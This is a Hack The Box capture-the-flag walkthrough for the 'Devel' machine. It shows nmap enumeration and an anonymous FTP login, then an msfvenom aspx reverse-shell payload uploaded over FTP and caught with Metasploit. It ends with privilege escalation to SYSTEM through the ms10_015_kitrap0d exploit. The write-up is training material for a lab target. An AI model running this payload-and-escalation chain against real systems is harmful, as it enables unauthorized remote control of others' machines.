___ ___ _________ ________ |\ \|\ \|\___ ___\\ __ \ ___ \ \ \\\ \|___ \ \_\ \ \|\ /_|\__\ \ \ __ \ \ \ \ \ \ __ \|__| \ \ \ \ \ \ \ \ \ \ \|\ \ ___ \ \__\ \__\ \ \__\ \ \_______\|\__\ \|__|\|__| \|__| \|_______|\|__| ________ _______ ___ ___ _______ ___ |\ ___ \|\ ___ \ |\ \ / /|\ ___ \ |\ \ \ \ \_|\ \ \ __/|\ \ \ / / | \ __/|\ \ \ \ \ \ \\ \ \ \_|/_\ \ \/ / / \ \ \_|/_\ \ \ \ \ \_\\ \ \ \_|\ \ \ / / \ \ \_|\ \ \ \____ \ \_______\ \_______\ \__/ / \ \_______\ \_______\ \|_______|\|_______|\|__|/ \|_______|\|_______|
Hack The Box's Devel is an Easy machine that is a great introduction to using msfvenom to generate a payload and privilege escalation using Metasploit. Devel is an excellent machine for those looking to move ahead from the extremely easy machines like Blue, Lame, or Legacy.
Once starting the machine on HTB and connecting to your HTB VPN, we will start by opening our terminal and pinging the machine's IP address to make sure the network is up. Make sure the IP address you enter matches the one displayed on HTB when you boot up the target machine.
ping 10.129.232.194
You should receive responses from the IP address. You can press CTRL + C to stop sending packets to the target host. Once confirming the network is up and running, it's time to start enumeration using Nmap.
Start
by doing a quick service scan using Nmap. We will use the -A
switch to
enable an aggressive scan that will give us the results of OS detection (-O), version scanning (-sV), script scanning (-sC) and traceroute (–traceroute). You can learn more about Nmap here. You should
receive the following output in your terminal:
nmap -A 10.129.232.194 Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-01 18:49 BST Nmap scan report for 10.129.232.194 Host is up (0.014s latency). Not shown: 998 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd | ftp-syst: |_ SYST: Windows_NT | ftp-anon: Anonymous FTP login allowed (FTP code 230) | 03-18-17 02:06AM <DIR> aspnet_client | 03-17-17 05:37PM 689 iisstart.htm |_03-17-17 05:37PM 184946 welcome.png 80/tcp open http Microsoft IIS httpd 7.5 |_http-server-header: Microsoft-IIS/7.5 |_http-title: IIS7 | http-methods: |_ Potentially risky methods: TRACE Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 11.53 seconds
On port 21 we can see that a FTP server is running and open. We can also see that anonymous FTP login is allowed! Anonymous FTP login can be performed by connecting to the FTP server and using "anonymous" for the Name credential and leaving the Password field blank by hitting Enter.
Let's attempt to log into the FTP server using anonymous credentials by typing "ftp" followed by the IP address and hitting Enter.
ftp 10.129.232.194 Connected to 10.129.232.194. 220 Microsoft FTP Service Name (10.129.232.194:root): anonymous 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230 User logged in. Remote system type is Windows_NT. ftp>
We're in! Next, we will need to use this FTP connection as an attack vector by creating and uploading a payload using msfvenom and the "put" command.
We will generate a aspx reverse shell payload to upload to the target computer by typing the following in a new terminal:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.75 LPORT=1234 -f aspx > devel.aspx
Please note, that the LHOST may be different and should match your machines IP. The LPORT can be any port number not in use and "devel.aspx" can have any file name you choose.
Hit Enter to generate the payload file in your present working directory.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.75 LPORT=1234 -f aspx > devel.aspx [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder specified, outputting raw payload Payload size: 354 bytes Final size of aspx file: 2861 bytes
Once msfvenom generates the payload, we will need to upload the file to the FTP server using "put". In the terminal connected to the FTP server, type "put" followed by the payload file name. Note, if you were in a different directory connecting to the FTP server than the directory containing the payload on your machine, you will need to disconnect from the FTP server, change the present working directory, then reconnect.
ftp> put devel.aspx local: devel.aspx remote: devel.aspx 200 PORT command successful. 125 Data connection already open; Transfer starting. 226 Transfer complete. 2897 bytes sent in 0.00 secs (65.7808 MB/s) ftp>
Our payload is now uploaded to the FTP server! In another terminal window or tab, let's boot up Metasploit by typing "msfconsole".
msfconsole +-------------------------------------------------------+ | METASPLOIT by Rapid7 | +---------------------------+---------------------------+ | __________________ | | | ==c(______(o(______(_() | |""""""""""""|======[*** | | )=\ | | EXPLOIT \ | | // \\ | |_____________\_______ | | // \\ | |==[msf >]============\ | | // \\ | |______________________\ | | // RECON \\ | \(@)(@)(@)(@)(@)(@)(@)/ | | // \\ | ********************* | +---------------------------+---------------------------+ | o O o | \'\/\/\/'/ | | o O | )======( | | o | .' LOOT '. | | |^^^^^^^^^^^^^^|l___ | / _||__ \ | | | PAYLOAD |""\___, | / (_||_ \ | | |________________|__|)__| | | __||_) | | | |(@)(@)"""**|(@)(@)**|(@) | " || " | | = = = = = = = = = = = = | '--------------' | +---------------------------+---------------------------+ =[ metasploit v6.1.9-dev ] + -- --=[ 2169 exploits - 1149 auxiliary - 398 post ] + -- --=[ 592 payloads - 45 encoders - 10 nops ] + -- --=[ 9 evasion ] Metasploit tip: Use the resource command to run commands from a file msf6 >
Once Metasploit is running type "use multi/handler" and hit Enter. Next, type "set payload windows/meterpreter/reverse_tcp" and hit Enter to set the payload. Once this is done, let's use "show options" to display the options needed to run the exploit.
msf6 > use multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf6 exploit(multi/handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thr ead, process, none) LHOST yes The listen address (an interface may b e specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target msf6 exploit(multi/handler) >
As you can see, we will need to set the LHOST and LPORT. The LHOST will be your machines IP and LPORT will be the port set when we created the payload using msfvenom. Remember, your LPORT may need to be set to tun0 if using HTB PWNBOX.
Set these options by using the "set" command followed by the option name and its setting.
msf6 exploit(multi/handler) > set LHOST tun0 LHOST => 10.10.14.75 msf6 exploit(multi/handler) > set LPORT 1234 LPORT => 1234 msf6 exploit(multi/handler) >
Type "run" and hit Enter. Then, open your web browser and navigate to our aspx file on the server by typing the ip address of the target machine followed by "/" then the aspx file name. For example, "10.129.232.194/devel.aspx". Once the page loads, a meterpreter session will populate in your Metasploit terminal. You are now connected.
msf6 exploit(multi/handler) > run [*] Started reverse TCP handler on 10.10.14.75:1234 [*] Sending stage (175174 bytes) to 10.129.247.224 [*] Meterpreter session 1 opened (10.10.14.75:1234 -> 10.129.247.224:49159) at 2022-05-01 20:10:00 +0100 meterpreter >
From here, we will need to do some basic privilege escalation using Metasploit. Let's background this session by using the "background" command and then using the "search" command, search for kitra. ms10_015_kitrap0d is a privilege escalation exploit that will work with this machine.
meterpreter > background [*] Backgrounding session 1... msf6 exploit(multi/handler) > search kitra Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/windows/local/ms10_015_kitrap0d 2010-01-19 great Yes Windows SYSTEM Escalation via KiTrap0D Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/local/ms10_015_kitrap0d msf6 exploit(multi/handler) > use 0 [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp msf6 exploit(windows/local/ms10_015_kitrap0d) >
If
you ever need suggestions for which exploit to run for a meterpreter
session, you can use Metasploits suggester. To use the suggester, type
"search suggester" and use the Multi Recon Local Exploit Suggester. Once
the module is loaded, set the SESSION option to the desired meterpreter session you have in the background, type "run" and hit Enter. This will give you suggested exploits for that meterpreter session.
Let's now view the exploit options using the "show options" command and setting the options accordingly. Your SESSION option should be set to whatever session number is assigned to the meterpreter session you put in the background. To view your background meterpreter sessions, you can use the "sessions" command. It should be 1 if you had no other sessions running in Metasploit. Remember to set your LHOST accordingly.
msf6 exploit(windows/local/ms10_015_kitrap0d) > show options Module options (exploit/windows/local/ms10_015_kitrap0d): Name Current Setting Required Description ---- --------------- -------- ----------- SESSION yes The session to run this module on. Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh , thread, process, none) LHOST 159.203.63.76 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Windows 2K SP4 - Windows 7 (x86) msf6 exploit(windows/local/ms10_015_kitrap0d) > set SESSION 1 SESSION => 1 msf6 exploit(windows/local/ms10_015_kitrap0d) > set LHOST tun0 LHOST => tun0 msf6 exploit(windows/local/ms10_015_kitrap0d) >
Now we can run the exploit using the "run" command to get a new meterpreter session.
msf6 exploit(windows/local/ms10_015_kitrap0d) > run [!] SESSION may not be compatible with this module: [!] * missing Meterpreter features: stdapi_sys_process_set_term_size [*] Started reverse TCP handler on 10.10.14.75:4444 [*] Reflectively injecting payload and triggering the bug... [*] Launching msiexec to host the DLL... [+] Process 3124 launched. [*] Reflectively injecting the DLL into 3124... [+] Exploit finished, wait for (hopefully privileged) payload execution to complete. [*] Sending stage (175174 bytes) to 10.129.247.224 [*] Meterpreter session 2 opened (10.10.14.75:4444 -> 10.129.247.224:49162) at 2022-05-01 20:47:04 +0100 meterpreter >
Success! We can now type "shell" and hit Enter to get a shell on the target system!
meterpreter > shell Process 3824 created. Channel 1 created. Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved. c:\windows\system32\inetsrv>
Congrats! After successfully completing privilege escalation on the target system, you can now obtain the root and user .txt flags which are located within the user and administrator's Desktop folders.